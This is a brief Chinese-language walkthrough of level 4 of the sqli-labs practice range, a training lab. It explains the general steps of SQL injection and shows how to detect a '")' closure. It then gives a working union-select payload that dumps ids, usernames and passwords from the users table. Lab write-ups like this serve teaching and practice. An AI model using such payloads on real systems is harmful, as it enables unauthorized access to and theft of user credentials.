---

sqli-labs靶場

每道題都從以下模板講解，并且每個步驟都有圖片，清晰明了，便于復盤。

sql注入的基本步驟

• 注入點
• 注入類型
  • 字符型：判斷閉合方式 （‘、"、’'、“”）
  • 數字型
• 根據實際情況，選擇合適的注入方式
• 獲取數據庫名，表名，列名，數據

less 4 聯合注入

• 題目類型: 字符型 " ） 閉合

id=2/0和id=2’回顯正常
id=2"有報錯，并且呈規律性
id=2"觀察報錯信息，" ) 是多余的，說明閉合方式是" )

這道題原理與less 3 一樣，只不過是閉合方式是 " ）
id=-1 " ) union select 1,2,group_concat(id,“-”,username,“-”,password) from users --+
直接猜解數據

---